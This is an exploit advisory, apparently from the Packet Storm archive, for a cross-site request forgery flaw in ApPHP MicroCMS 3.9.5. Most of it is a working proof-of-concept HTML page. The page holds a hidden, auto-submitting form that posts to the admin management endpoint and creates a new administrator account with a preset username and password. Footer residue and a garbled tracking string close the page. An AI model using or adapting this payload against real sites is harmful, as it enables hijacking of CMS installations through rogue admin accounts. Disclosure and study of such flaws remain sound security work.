ApPHP MicroCMS version 3.9.5 suffers from a cross site request forgery vulnerability.
e550d979c1c46ff4b56ff391db1c789649e02652f0a38ad39c40251cd0f3f007# Exploit Title :----------------- : ApPHP MicroCMS 3.9.5 - Cross-Site Request Forgery (Add Admin (Main))
# Author :------------------------ : Besim
# Google Dork :---------------- : -
# Date :-------------------------- : 12/10/2016
# Type :-------------------------- : webapps
# Platform : -------------------- : PHP
# Vendor Homepage :------- : http://www.apphp.com
# Software link : -------------- : https://www.apphp.com/customer/index.php?page=free-products
*-* Vulnerable link : http://site_name/path/index.php?admin=admins_management
############ CSRF PoC #############
<html>
<!-- CSRF PoC -->
<body>
<form action="http://site_name/path/index.php?admin=admins_management" method="POST" enctype="multipart/form-data">
<input type="hidden" name="mg_prefix" value="
" />
<input type="hidden" name="mg_action" value="create" />
<input type="hidden" name="mg_rid" value="-1" />
<input type="hidden" name="mg_sorting_fields" value="
" />
<input type="hidden" name="mg_sorting_types" value="
" />
<input type="hidden" name="mg_page" value="1" />
<input type="hidden" name="mg_operation" value="
" />
<input type="hidden" name="mg_operation_type" value="
" />
<input type="hidden" name="mg_operation_field" value="
" />
<input type="hidden" name="mg_search_status" value="
" />
<input type="hidden" name="mg_language_id" value="
" />
<input type="hidden" name="mg_operation_code" value="yh0ox75feagwqbccp8ef" />
<input type="hidden" name="token" value="dbe0e51cf3a5ce407336a94f52043157" />
<input type="hidden" name="date_lastlogin" value="
" />
<input type="hidden" name="date_created" value="2016-10-12 21:14:06" />
<input type="hidden" name="first_name" value="meryem" />
<input type="hidden" name="last_name" value="ak" />
<input type="hidden" name="email" value="mmm@yopmail.com" />
<input type="hidden" name="user_name" value="meryem" />
<input type="hidden" name="password" value="meryem" />
<input type="hidden" name="account_type" value="admin" />
<input type="hidden" name="preferred_language" value="en" />
<input type="hidden" name="is_active" value="1" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
############ ########## ############
*-* Thanks Meryem AKDOAAN *-*
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed